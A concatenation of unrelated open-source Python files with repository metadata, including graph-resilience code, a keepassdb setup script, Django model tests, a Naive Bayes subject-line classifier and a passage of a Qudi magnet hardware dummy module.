""" tests random_order function """
graph = {0: {1, 2},
1: {0},
2: {0},
3: {4},
4: {3}}
print "graph:", graph
ro_graph = random_order(graph)
print "random_order graph:", ro_graph
def bfs_visited(ugraph, start_node):
""" takes undirected graph and node as input;
returns set of all nodes visited by breadth-first search starting at start_node """
queue = deque()
visited = set([start_node])
queue.append(start_node)
# print "start_node:", start_node
while len(queue) > 0:
current_node = queue.pop()
# print "current_node:", current_node
if current_node in ugraph:
for neighbor in ugraph[current_node]:
if neighbor not in visited:
visited.add(neighbor)
queue.append(neighbor)
return visited
def cc_visited(ugraph):
""" takes ugraph and returns list of sets where each set consists of all the nodes (and nothing else) in a connected component and there is exactly one set in the list for each connected component in ugraph and nothing else
"""
remaining_nodes = []
for node in ugraph:
remaining_nodes.append(node)
c_comp = []
while len(remaining_nodes) > 0:
current_node = remaining_nodes.pop()
working_set = bfs_visited(ugraph, current_node)
c_comp.append(working_set)
dummyvar = [remaining_nodes.remove(ws_item) for ws_item in working_set if ws_item in remaining_nodes]
return c_comp
def largest_cc_size(ugraph):
""" computes and returns the size of the largest connected component of ugraph; returns an int """
largest_num = 0
c_comp = cc_visited(ugraph)
for group in c_comp:
if len(group) > largest_num:
largest_num = len(group)
return largest_num
def compute_resilience(ugraph, attack_order):
""" takes an undirected graph and a list of nodes, attack_order;
iterates through the nodes in attack_order.
For each node, removes the given node and its edges from ugraph and then computes the size of the largest cc for the resulting graph.
returns a list whose k + 1th entry is the size of the largest cc in the graph after removal of the first k nodes in attack_order. The first entry in the returned list is the size of the largest cc in the original graph"""
resilience = []
resilience.append(largest_cc_size(ugraph))
# iterate through nodes in attack_order
for target in attack_order:
# in order to remove given node and its edges from ugraph
# first create a list of neighbor nodes to visit for removal of edges
neighbors = bfs_visited(ugraph, target)
# then visit each neighbor, removing target from its list of neighbors
for neighbor in neighbors:
if neighbor in ugraph and target in ugraph[neighbor]:
ugraph[neighbor].remove(target)
# delete_node(ugraph, target)
# next remove the target node
# del ugraph[target]
delete_node(ugraph, target)
# compute size of largest cc for resulting graph
largest_cc = largest_cc_size(ugraph)
# append largest cc to result list
resilience.append(largest_cc)
# return result list
# print "\nresilience:", resilience
return resilience
# Begin Test calls -------------------------------------
# test random_order
# test_random_order()
# test_gen_er_graph()
# End Test calls ---------------------------------------
# Questions---------------------------------------------
# 1. probability = .004 m = 2 (# edges)
probability = .004
num_nodes = 1200
final_nodes = 1239
# for each of the 3 graphs, compute a random attack order using random_order and use this attack order in compute_resilience to compute the resilience of each graph
# # network ------------------
network_graph = load_graph(NETWORK_URL)
attack_order_net = random_order(network_graph)
resilience_net = compute_resilience(network_graph, attack_order_net)
# ER -----------------------
er_graph = gen_er_graph(num_nodes, probability)
attack_order_er = random_order(er_graph)
resilience_er = compute_resilience(er_graph, attack_order_er)
# # UPA ----------------------
upa_graph = gen_upa_graph(final_nodes, num_nodes, probability)
attack_order_upa = random_order(upa_graph)
resilience_upa = compute_resilience(upa_graph, attack_order_upa)
# # plot all three resilience curves on a single standard plot (not log/log)
xvals = range(num_nodes)
xvals = range(len(resilience_net))
xvals2 = range(len(resilience_er))
xvals3 = range(len(resilience_upa))
yvals1 = resilience_net
yvals2 = resilience_er
yvals3 = resilience_upa
plt.plot(xvals, yvals1, '-b', label='Network')
plt.plot(xvals2, yvals2, '-r', label='ER')
plt.plot(xvals3, yvals3, '-g', label='UPA')
plt.legend(loc='upper right')
plt.show()
|
vonnenaut/computer-network-analysis
|
main.py
|
Python
|
gpl-3.0
| 10,602
|
# -*- coding: utf-8 -*-
import pandas as pd
import numpy as np
from axiomatic.base import AxiomSystem
from axiomatic.elementary_conditions import MinMaxAxiom
# l, r, pmin, pmax
params = [1, 1, -0.8, 0.8]
axiom_list = [MinMaxAxiom(params)]
ts = pd.DataFrame(np.random.random((10, 2)))
print(ts)
print(MinMaxAxiom(params).run(ts, dict()))
now = AxiomSystem(axiom_list)
print(now.perform_marking(ts))
|
victorshch/axiomatic
|
test_axiom_system.py
|
Python
|
gpl-3.0
| 402
|
# -*- coding: utf-8 -*-
import os.path
import re
import warnings
try:
from setuptools import setup, find_packages
except ImportError:
from distribute_setup import use_setuptools
use_setuptools()
from setuptools import setup, find_packages
version = '0.2.1'
news = os.path.join(os.path.dirname(__file__), 'docs', 'news.rst')
news = open(news).read()
parts = re.split(r'([0-9\.]+)\s*\n\r?-+\n\r?', news)
found_news = ''
for i in range(len(parts)-1):
if parts[i] == version:
found_news = parts[i+i]
break
if not found_news:
warnings.warn('No news for this version found.')
long_description = """
keepassdb is a Python library that provides functionality for reading and writing
KeePass 1.x (and KeePassX) password databases.
This library brings together work by multiple authors, including:
- Karsten-Kai König <kkoenig@posteo.de>
- Brett Viren <brett.viren@gmail.com>
- Wakayama Shirou <shirou.faw@gmail.com>
"""
if found_news:
title = 'Changes in %s' % version
long_description += "\n%s\n%s\n" % (title, '-'*len(title))
long_description += found_news
setup(
name = "keepassdb",
version = version,
author = "Hans Lellelid",
author_email = "hans@xmpl.org",
url = "http://github.com/hozn/keepassdb",
license = "GPLv3",
description = "Python library for reading and writing KeePass 1.x databases.",
long_description = long_description,
packages = find_packages(),
include_package_data=True,
package_data={'keepassdb': ['tests/resources/*']},
install_requires=['pycrypto>=2.6,<3.0dev'],
tests_require = ['nose>=1.0.3'],
test_suite = 'keepassdb.tests',
classifiers=[
'Development Status :: 3 - Alpha',
'License :: OSI Approved :: GNU General Public License (GPL)',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.0',
'Programming Language :: Python :: 3.1',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Topic :: Security :: Cryptography',
'Topic :: Software Development :: Libraries :: Python Modules'
],
use_2to3=True,
zip_safe=False # Technically it should be fine, but there are issues w/ 2to3
)
|
hozn/keepassdb
|
setup.py
|
Python
|
gpl-3.0
| 2,399
|
# coding=utf-8
# Title:信息加密
# 给你个小写英文字符串a和一个非负数b(0<=b<26), 将a中的每个小写字符替换成字母表中比它大b的字母。这里将字母表的z和a相连,如果超过了z就回到了a。
# 例如a="cagy", b=3,
# 则输出 :fdjb
# Test
a, b="cagy",3
# Answer
e = []
for i in range(0,len(a)):
c = ord(a[i])+b # 转换成整数
if c> 122: # 如果大于z则减去26
c -= 26
e.append(chr(c)) # 加入到列表中
str = "".join(e) # 列表和并成字符串
print str
|
RYLF/pythontip
|
20.py
|
Python
|
gpl-3.0
| 568
|
from static import tools
class DrawAble(object):
def __init__(self,image,position,zIndex=0,activated=True):
self.image=image
self.position=position
self._zIndex=zIndex
self.__activated=None
self.activated=activated
def __del__(self):
self.activated=False
#zindex
def __getZIndex(self):
return self._zIndex
zIndex=property(__getZIndex)
#enabled
def _disable(self):
tools.spritebatch.remove(self)
def _enable(self):
tools.spritebatch.add(self)
def __setActivated(self,b):
if self.__activated!=b:
self.__activated=b
if b:
self._enable()
else:
self._disable()
def __getActivated(self):
return self.__activated
activated=property(__getActivated,__setActivated)
|
gitlitz/pygame-with-interpreter
|
drawable.py
|
Python
|
gpl-3.0
| 750
|
#!/usr/bin/python
class App:
""" A representation of an Android app containing basic knowledge about the app """
def __init__(self, appName, appID, appVersionCode, appOfferType, appRating, appPrice, appSize):
self.appName = appName
self.appID = appID
self.appVersionCode = appVersionCode
self.appOfferType = appOfferType
self.appRating = appRating
self.appPrice = appPrice
self.appSize = appSize
|
aleisalem/Aion
|
shared/App.py
|
Python
|
gpl-3.0
| 464
|
# -*- coding: utf-8 -*-
"""
ctf.py -- contrast transfer function in electron tomography
Copyright 2014 Holger Kohr
This file is part of tomok.
tomok is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
tomok is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with tomok. If not, see <http://www.gnu.org/licenses/>.
"""
from __future__ import division
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import range
from builtins import object
import numpy as np
class ContrTransFunc(object):
"""Callable Contrast Transfer Function class.
TODO: finish this properly."""
def __init__(self, emcfg):
self.osc_polycoeff = emcfg.osc_polycoeff
self.env_polycoeff = emcfg.env_polycoeff
self.cutoff2 = (emcfg.wavenum * emcfg.aperture / (emcfg.focal_len *
emcfg.magnif))**2
def __call__(self, freq2, envelope=True):
ctfval = np.exp(np.polyval(1j * self.osc_polycoeff, freq2))
if envelope:
ctfval *= np.exp(-np.polyval(self.env_polycoeff, freq2))
return np.where(freq2 < self.cutoff2, ctfval, 0.0)
# TODO: display method
class ContrTransFuncACR(object):
"""Callable class for the constant acr CTF.
TODO: finish this."""
def __init__(self, emcfg, acr=0.1):
ocoeff = emcfg.osc_polycoeff
ocoeff[3] = np.arctan(acr)
self.osc_polycoeff = ocoeff
self.env_polycoeff = emcfg.env_polycoeff
self.cutoff2 = (emcfg.wavenum * emcfg.aperture / (emcfg.focal_len *
emcfg.magnif))**2
def __call__(self, freq2, envelope=True):
ctfval = np.sin(np.polyval(self.osc_polycoeff, freq2))
if envelope:
ctfval *= np.exp(-np.polyval(self.env_polycoeff, freq2))
return np.where(freq2 < self.cutoff2, ctfval, 0.0)
def zeros(self, num=0, maxfreq2=None):
"""The zeros as an array.
TODO: finish"""
# The sine zeros are those of the polynomials a*x^2 + b*x + c_i,
# where a and b are the quadratic / linear coefficients of
# the sine argument and c_i = constant coeff. - (i+1)*pi
zeros = []
p_a = self.osc_polycoeff[1]
p_b = self.osc_polycoeff[2]
maxzeros = 1000
nmax = num if num else maxzeros
for i in range(nmax):
p_c = self.osc_polycoeff[3] - (i + 1) * np.pi
zero = np.sqrt(p_b**2 - 4. * p_a * p_c) / (2 * p_a)
if maxfreq2 is not None and zero > maxfreq2:
break
zeros.append(zero)
return np.asarray(zeros)
# TODO: display method
|
kohr-h/tomok
|
ctf.py
|
Python
|
gpl-3.0
| 3,242
|
bg_image_modes = ('stretch', 'tile', 'center', 'right', 'left')
transitions_jquery_ui = (
'blind', 'bounce', 'clip', 'drop', 'explode', 'fade', 'fold',
'highlight', 'puff', 'pulsate', 'scale', 'shake', 'size', 'slide'
)
transitions_animatecss = (
'bounceIn',
'bounceInDown',
'bounceInLeft',
'bounceInRight',
'bounceInUp',
'fadeIn',
'fadeInDown',
'fadeInDownBig',
'fadeInLeft',
'fadeInLeftBig',
'fadeInRight',
'fadeInRightBig',
'fadeInUp',
'fadeInUpBig',
'flipInX',
'flipInY',
'lightSpeedIn',
'rotateIn',
'rotateInDownLeft',
'rotateInDownRight',
'rotateInUpLeft',
'rotateInUpRight',
'rollIn',
'zoomIn',
'zoomInDown',
'zoomInLeft',
'zoomInRight',
'zoomInUp',
'slideInDown',
'slideInLeft',
'slideInRight',
'slideInUp',
)
|
alandmoore/pystump
|
includes/lookups.py
|
Python
|
gpl-3.0
| 856
|
# coding: utf-8
"""
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from django.test import TestCase
from django.core.exceptions import ValidationError
from eventex.core.models import Speaker, Contact
class SpeakerModelTest(TestCase):
"""
Test class.
"""
def setUp(self):
"""
Test initialization.
"""
self.speaker = Speaker(
name='Davi Garcia',
slug='davi-garcia',
url='http://www.davigarcia.com.br',
description='Passionate software developer!'
)
self.speaker.save()
def test_create(self):
"""
Speaker instance must be saved.
"""
self.assertEqual(1, self.speaker.pk)
def test_unicode(self):
"""
Speaker string representation should be the name.
"""
self.assertEqual(u'Davi Garcia', unicode(self.speaker))
class ContactModelTest(TestCase):
"""
Test class.
"""
def setUp(self):
"""
Test initialization.
"""
self.speaker = Speaker.objects.create(
name='Davi Garcia',
slug='davi-garcia',
url='http://www.davigarcia.com.br',
description='Passionate software developer!'
)
def test_email(self):
"""
Speaker should have email contact.
"""
contact = Contact.objects.create(
speaker=self.speaker,
kind='E',
value='henrique@bastos.net'
)
self.assertEqual(1, contact.pk)
def test_phone(self):
"""
Speaker should have email contact.
"""
contact = Contact.objects.create(
speaker=self.speaker,
kind='P',
value='21-987654321'
)
self.assertEqual(1, contact.pk)
def test_fax(self):
"""
Speaker should have email contact.
"""
contact = Contact.objects.create(
speaker=self.speaker,
kind='F',
value='21-123456789'
)
self.assertEqual(1, contact.pk)
def test_kind(self):
"""
Contact kind must be limited to E, P or F.
"""
contact = Contact(speaker=self.speaker, kind='A', value='B')
self.assertRaises(ValidationError, contact.full_clean)
def test_unicode(self):
"""
Contact string representation should be value.
"""
contact = Contact(
speaker=self.speaker,
kind='E',
value='davivcgarcia@gmail.com')
self.assertEqual(u'davivcgarcia@gmail.com', unicode(contact))
|
davivcgarcia/wttd-15
|
eventex/core/tests/test_models_speaker_contact.py
|
Python
|
gpl-3.0
| 3,199
|
string = input()
string[0] = "a"
|
LTKills/languages
|
python/data_structures/strings.py
|
Python
|
gpl-3.0
| 36
|
import os
import unittest
from vsg.rules import generate
from vsg import vhdlFile
from vsg.tests import utils
sTestDir = os.path.dirname(__file__)
lFile, eError =vhdlFile.utils.read_vhdlfile(os.path.join(sTestDir,'rule_015_test_input.vhd'))
lExpected = []
lExpected.append('')
utils.read_file(os.path.join(sTestDir, 'rule_015_test_input.fixed.vhd'), lExpected)
class test_generate_rule(unittest.TestCase):
def setUp(self):
self.oFile = vhdlFile.vhdlFile(lFile)
self.assertIsNone(eError)
def test_rule_015(self):
oRule = generate.rule_015()
self.assertTrue(oRule)
self.assertEqual(oRule.name, 'generate')
self.assertEqual(oRule.identifier, '015')
lExpected = [20, 25, 30]
oRule.analyze(self.oFile)
self.assertEqual(lExpected, utils.extract_violation_lines_from_violation_object(oRule.violations))
def test_fix_rule_015(self):
oRule = generate.rule_015()
oRule.fix(self.oFile)
lActual = self.oFile.get_lines()
self.assertEqual(lExpected, lActual)
oRule.analyze(self.oFile)
self.assertEqual(oRule.violations, [])
|
jeremiah-c-leary/vhdl-style-guide
|
vsg/tests/generate/test_rule_015.py
|
Python
|
gpl-3.0
| 1,158
|
#
# This file is part of Checkbox.
#
# Copyright 2008 Canonical Ltd.
#
# Checkbox is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Checkbox is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Checkbox. If not, see <http://www.gnu.org/licenses/>.
#
from gettext import gettext as _
from checkbox.plugin import Plugin
from checkbox.properties import String
final_text = String(default=_("Successfully finished testing!"))
class FinalPrompt(Plugin):
def register(self, manager):
super(FinalPrompt, self).register(manager)
# Final should be prompted first
self._manager.reactor.call_on("prompt-finish", self.prompt_finish, -100)
self._manager.reactor.call_on("report-final-text", self._on_report_final_text, -100)
def _on_report_final_text(self, text):
self.final_text = text
def prompt_finish(self, interface):
interface.show_text(self.final_text, next=_("_Finish"))
factory = FinalPrompt
|
jds2001/ocp-checkbox
|
plugins/final_prompt.py
|
Python
|
gpl-3.0
| 1,402
|
from enum import Enum
from typing import Union, List, Optional
from .space2d import *
from .space3d import *
class JoinTypes(Enum):
"""
Enumeration for Line and Segment type.
"""
START_START = 1 # start point coincident with start point
START_END = 2 # start point coincident with end point
END_START = 3 # end point coincident with start point
END_END = 4 # end point coincident with end point
def analizeJoins2D(
first: Union[Line2D, Segment2D],
second: Union[Line2D, Segment2D]
) -> List[Optional[JoinTypes]]:
"""
Analyze join types between two lines/segments.
:param first: a line or segment.
:param second: a line or segment.
:return: a list of join types.
Examples:
>>> first = Segment2D(Point2D(x=0,y=0), Point2D(x=1,y=0))
>>> second = Segment2D(Point2D(x=1,y=0), Point2D(x=0,y=0))
>>> analizeJoins2D(first, second)
[<JoinTypes.START_END: 2>, <JoinTypes.END_START: 3>]
>>> first = Segment2D(Point2D(x=0,y=0), Point2D(x=1,y=0))
>>> second = Segment2D(Point2D(x=2,y=0), Point2D(x=3,y=0))
>>> analizeJoins2D(first, second)
[]
"""
join_types = []
if first.start_pt.is_coincident(second.start_pt):
join_types.append(JoinTypes.START_START)
if first.start_pt.is_coincident(second.end_pt):
join_types.append(JoinTypes.START_END)
if first.end_pt.is_coincident(second.start_pt):
join_types.append(JoinTypes.END_START)
if first.end_pt.is_coincident(second.end_pt):
join_types.append(JoinTypes.END_END)
return join_types
def analizeJoins3D(
first: Union[Line3D, Segment3D],
second: Union[Line3D, Segment3D]
) -> List[Optional[JoinTypes]]:
"""
Analyze join types between two lines/segments.
:param first: a line or segment.
:type first: Line or Segment.
:param second: a line or segment.
:param second: Line or Segment.
:return: a list of join types.
:rtype: List[Optional[JoinTypes]].
Examples:
"""
join_types = []
if first.start_pt.is_coincident(second.start_pt):
join_types.append(JoinTypes.START_START)
if first.start_pt.is_coincident(second.end_pt):
join_types.append(JoinTypes.START_END)
if first.end_pt.is_coincident(second.start_pt):
join_types.append(JoinTypes.END_START)
if first.end_pt.is_coincident(second.end_pt):
join_types.append(JoinTypes.END_END)
return join_types
|
mauroalberti/gsf
|
pygsf/geometries/shapes/joins.py
|
Python
|
gpl-3.0
| 2,499
|
# Copyright (C) 2015-2020 The Sipwise Team - http://sipwise.com
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
from .gri import GerritRepoInfo # noqa
from .jbi import JenkinsBuildInfo # noqa
from .wni import WorkfrontNoteInfo # noqa
|
sipwise/repoapi
|
repoapi/models/__init__.py
|
Python
|
gpl-3.0
| 825
|
import csv
def list_words(text):
words = []
words_tmp = text.lower().split()
for p in words_tmp:
if p not in words and len(p) > 2:
words.append(p)
return words
def training(texts):
c_words ={}
c_categories ={}
c_texts = 0
c_tot_words =0
for t in texts:
c_texts = c_texts + 1
if t[1] not in c_categories:
c_categories[t[1]] = 1
else:
c_categories[t[1]]= c_categories[t[1]] + 1
for t in texts:
words = list_words(t[0])
for p in words:
if p not in c_words:
c_tot_words = c_tot_words +1
c_words[p] = {}
for c in c_categories:
c_words[p][c] = 0
c_words[p][t[1]] = c_words[p][t[1]] + 1
return (c_words, c_categories, c_texts, c_tot_words)
def classifier(subject_line, c_words, c_categories, c_texts, c_tot_words):
category =""
category_prob = 0
for c in c_categories:
prob_c = float(c_categories[c])/float(c_texts)
words = list_words(subject_line)
prob_total_c = prob_c
for p in words:
if p in c_words:
prob_p= float(c_words[p][c])/float(c_tot_words)
prob_cond = prob_p/prob_c
prob =(prob_cond * prob_p)/ prob_c
prob_total_c = prob_total_c * prob
if category_prob < prob_total_c:
category = c
category_prob = prob_total_c
return (category, category_prob)
if __name__ == "__main__":
with open('training.csv') as f:
subjects = dict(csv.reader(f, delimiter=','))
p,c,t,tp = training(subjects.items())
#First Test
clase = classifier("Available on Term Life - Free",p,c,t,tp)
print("Result: {0} ".format(clase))
#Second Test
with open("test.csv") as f:
correct = 0
tests = csv.reader(f)
for subject in tests:
clase = classifier(subject[0],p,c,t,tp)
if clase[0] == subject[1]:
correct += 1
print("Efficiency {0} of 10".format(correct))
|
liao1995/DataAnalysis
|
NaiveBayes.py
|
Python
|
gpl-3.0
| 2,150
|
import time
def start():
return time.time()
|
Kyziridis/recommender_system
|
helpers/Time.py
|
Python
|
gpl-3.0
| 51
|
# -*- coding: utf-8 -*-
"""
This file contains the dummy for a magnet interface.
Qudi is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Qudi is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Qudi. If not, see <http://www.gnu.org/licenses/>.
Copyright (c) the Qudi Developers. See the COPYRIGHT.txt file at the
top-level directory of this distribution and at <https://github.com/Ulm-IQO/qudi/>
"""
from collections import OrderedDict
from core.base import Base
from interface.magnet_interface import MagnetInterface
class MagnetAxisDummy:
""" Generic dummy magnet representing one axis. """
def __init__(self, label):
self.label = label
self.pos = 0.0
self.status = 0, {0: 'MagnetDummy Idle'}
class MagnetDummy(Base, MagnetInterface):
"""This is the Interface class to define the controls for the simple
magnet hardware.
"""
_modtype = 'MagnetDummy'
_modclass = 'hardware'
_out = {'magnetstage': 'MagnetInterface'}
def __init__(self, config, **kwargs):
super().__init__(config=config, **kwargs)
self.log.info('The following configuration was found.')
# checking for the right configuration
for key in config.keys():
self.log.info('{0}: {1}'.format(key,config[key]))
#these label should be actually set by the config.
self._x_axis = MagnetAxisDummy('x')
self._y_axis = MagnetAxisDummy('y')
self._z_axis = MagnetAxisDummy('z')
self._phi_axis = MagnetAxisDummy('phi')
#TODO: Checks if configuration is set and is reasonable
def on_activate(self, e):
""" Definition and initialisation of the GUI.
@param object e: Fysom.event object from Fysom class.
An object created by the state machine module Fysom,
which is connected to a specific event (have a look in
the Base Class). This object contains the passed event,
the state before the event happened and the destination
of the state which should be reached after the event
had happened.
"""
pass
def on_deactivate(self, e):
""" Deactivate the module properly.
@param object e: Fysom.event object from Fysom class. A more detailed
explanation can be found in the method activation.
"""
pass
def get_constraints(self):
""" Retrieve the hardware constrains from the motor device.
@return dict: dict with constraints for the magnet hardware. These
constraints will be passed via the logic to the GUI so
that proper display elements with boundary conditions
could be made.
Provides all the constraints for each axis of a motorized stage
(like total travel distance, velocity, ...)
Each axis has its own dictionary, where the label is used as the
identifier throughout the whole module. The dictionaries for each axis
are again grouped together in a constraints dictionary in the form
{'<label_axis0>': axis0 }
where axis0 is again a dict with the possible values defined below. The
possible keys in the constraint are defined here in the interface file.
If the hardware does not support the values for the constraints, then
insert just None. If you are not sure about the meaning, look in other
hardware files to get an impression.
"""
constraints = OrderedDict()
axis0 = {}
axis0['label'] = self._x_axis.label # name is just as a sanity included
axis0['unit'] = 'm' # the SI units
axis0['ramp'] = ['Sinus','Linear'] # a possible list of ramps
axis0['pos_min'] = 0
axis0['pos_max'] = 100e-3 # that is basically the traveling range
axis0['pos_step'] = 0.001e-3
axis0['vel_min'] = 0
axis0['vel_max'] = 100e-3
axis0['vel_step'] = 0.01e-3
axis0['acc_min'] = 0.1e-3
axis0['acc_max'] = 0.0
axis0['acc_step'] = 0.0
axis1 = {}
axis1['label'] = self._y_axis.label # that axis label should be obtained from config
axis1['unit'] = 'm' # the SI units
axis1['ramp'] = ['Sinus','Linear'] # a possible list of ramps
axis1['pos_min'] = 0
axis1['pos_max'] = 100e-3 # that is basically the traveling range
axis1['pos_step'] = 0.001e-3
axis1['vel_min'] = 0
axis1['vel_max'] = 100e-3
axis1['vel_step'] = 0.01e-3
axis1['acc_min'] = 0.1e-3
axis1['acc_max'] = 0.0
axis1['acc_step'] = 0.0
axis2 = {}
axis2['label'] = self._z_axis.label # that axis label should be obtained from config
axis2['unit'] = 'm' # the SI units
axis2['ramp'] = ['Sinus','Linear'] # a possible list of ramps
axis2['pos_min'] = 0
axis2['pos_max'] = 100e-3 # that is basically the traveling range
axis2['pos_step'] = 0.001e-3
axis2['vel_min'] = 0
axis2['vel_max'] = 100e-3
axis2['vel_step'] = 0.01e-3
axis2['acc_min'] = 0.1e-3
axis2['acc_max'] = 0.0
axis2['acc_step'] = 0.0
axis3 = {}
axis3['label'] = self._phi_axis.label # that axis label should be obtained from config
axis3['unit'] = '°' # the SI units
axis3['ramp'] = ['Sinus','Trapez'] # a possible list of ramps
axis3['pos_min'] = 0
axis3['pos_max'] = 360 # that is basically the traveling range
axis3['pos_step'] = 0.1
axis3['vel_min'] = 1
axis3['vel_max'] = 20
axis3['vel_step'] = 0.1
axis3['acc_min'] = None
axis3['acc_max'] = None
axis3['acc_step'] = None
# assign the parameter container for x to a name which will identify it
constraints[axis0['label']] = axis0
constraints[axis1['label']] = axis1
constraints[axis2['label']] = axis2
constraints[axis3['label']] = axis3
return constraints
def move_rel(self, param_dict):
""" Moves magnet in given direction (relative movement)
@param dict param_dict: dictionary, which passes all the relevant
parameters, which should be changed.
With get_constraints() you can obtain all
possible parameters of that stage. According to
this parameter set you have to pass a dictionary
with keys that are called like the parameters
from get_constraints() and assign a SI value to
that. For a movement in x the dict should e.g.
have the form:
dict = { 'x' : 23 }
where the label 'x' corresponds to the chosen
axis label.
A smart idea would be to ask the position after the movement.
"""
curr_pos_dict = self.get_pos()
constraints = self.get_constraints()
if param_dict.get(self._x_axis.label) is not None:
move_x = param_dict[self._x_axis.label]
curr_pos_x = curr_pos_dict[self._x_axis.label]
if (curr_pos_x + move_x > constraints[self._x_axis.label]['pos_max'] ) or\
(curr_pos_x + move_x < constraints[self._x_axis.label]['pos_min']):
self.log.warning('Cannot make further movement of the axis '
'"{0}" with the step {1}, since the border [{2},{3}] '
' of the magnet was reached! Ignore '
'command!'.format(
self._x_axis.label,
move_x,
constraints[self._x_axis.label]['pos_min'],
constraints[self._x_axis.label]['pos_max']))
else:
self._x_axis.pos = self._x_axis.pos + move_x
if param_dict.get(self._y_axis.label) is not None:
move_y = param_dict[self._y_axis.label]
curr_pos_y = curr_pos_dict[self._y_axis.label]
if (curr_pos_y + move_y > constraints[self._y_axis.label]['pos_max'] ) or\
(curr_pos_y + move_y < constraints[self._y_axis.label]['pos_min']):
self.log.warning('Cannot make further movement of the axis '
'"{0}" with the step {1}, since the border [{2},{3}] '
' of the magnet was reached! Ignore '
'command!'.format(
self._y_axis.label,
move_y,
constraints[self._y_axis.label]['pos_min'],
constraints[self._y_axis.label]['pos_max']))
else:
self._y_axis.pos = self._y_axis.pos + move_y
if param_dict.get(self._z_axis.label) is not None:
move_z = param_dict[self._z_axis.label]
curr_pos_z = curr_pos_dict[self._z_axis.label]
if (curr_pos_z + move_z > constraints[self._z_axis.label]['pos_max'] ) or\
(curr_pos_z + move_z < constraints[self._z_axis.label]['pos_min']):
self.log.warning('Cannot make further movement of the axis '
'"{0}" with the step {1}, since the border [{2},{3}] '
' of the magnet was reached! Ignore '
'command!'.format(
self._z_axis.label,
move_z,
constraints[self._z_axis.label]['pos_min'],
constraints[self._z_axis.label]['pos_max']))
else:
self._z_axis.pos = self._z_axis.pos + move_z
if param_dict.get(self._phi_axis.label) is not None:
move_phi = param_dict[self._phi_axis.label]
curr_pos_phi = curr_pos_dict[self._phi_axis.label]
if (curr_pos_phi + move_phi > constraints[self._phi_axis.label]['pos_max'] ) or\
(curr_pos_phi + move_phi < constraints[self._phi_axis.label]['pos_min']):
self.log.warning('Cannot make further movement of the axis '
'"{0}" with the step {1}, since the border [{2},{3}] '
' of the magnet was reached! Ignore '
'command!'.format(
self._phi_axis.label,
move_phi,
constraints[self._phi_axis.label]['pos_min'],
constraints[self._phi_axis.label]['pos_max']))
else:
self._phi_axis.pos = self._phi_axis.pos + move_phi
def move_abs(self, param_dict):
""" Moves magnet to absolute position (absolute movement)
@param dict param_dict: dictionary, which passes all the relevant
parameters, which should be changed. Usage:
{'axis_label': <a-value>}.
'axis_label' must correspond to a label given
to one of the axis.
A smart idea would be to ask the position after the movement.
"""
constraints = self.get_constraints()
if param_dict.get(self._x_axis.label) is not None:
desired_pos = param_dict[self._x_axis.label]
constr = constraints[self._x_axis.label]
if not(constr['pos_min'] <= desired_pos <= constr['pos_max']):
self.log.warning('Cannot make absolute movement of the axis '
'"{0}" to possition {1}, since it exceeds the limits '
'[{2},{3}] of the magnet! Command is '
'ignored!'.format(
self._x_axis.label,
desired_pos,
constr['pos_min'],
constr['pos_max']))
else:
self._x_axis.pos = desired_pos
if param_dict.get(self._y_axis.label) is not None:
desired_pos = param_dict[self._y_axis.label]
constr = constraints[self._y_axis.label]
if not(constr['pos_min'] <= desired_pos <= constr['pos_max']):
self.log.warning('Cannot make absolute movement of the axis '
'"{0}" to possition {1}, since it exceeds the limits '
'[{2},{3}] of the magnet! Command is '
'ignored!'.format(
self._y_axis.label,
desired_pos,
constr['pos_min'],
constr['pos_max']))
else:
self._y_axis.pos = desired_pos
if param_dict.get(self._z_axis.label) is not None:
desired_pos = param_dict[self._z_axis.label]
constr = constraints[self._z_axis.label]
if not(constr['pos_min'] <= desired_pos <= constr['pos_max']):
self.log.warning('Cannot make absolute movement of the axis '
'"{0}" to possition {1}, since it exceeds the limits '
'[{2},{3}] of the magnet! Command is '
'ignored!'.format(
self._z_axis.label,
desired_pos,
constr['pos_min'],
constr['pos_max']))
else:
self._z_axis.pos = desired_pos
if param_dict.get(self._phi_axis.label) is not None:
desired_pos = param_dict[self._phi_axis.label]
constr = constraints[self._phi_axis.label]
if not(constr['pos_min'] <= desired_pos <= constr['pos_max']):
self.log.warning('Cannot make absolute movement of the axis '
'"{0}" to possition {1}, since it exceeds the limits '
'[{2},{3}] of the magnet! Command is ignored!'.format(
self._phi_axis.label,
desired_pos,
constr['pos_min'],
constr['pos_max']))
else:
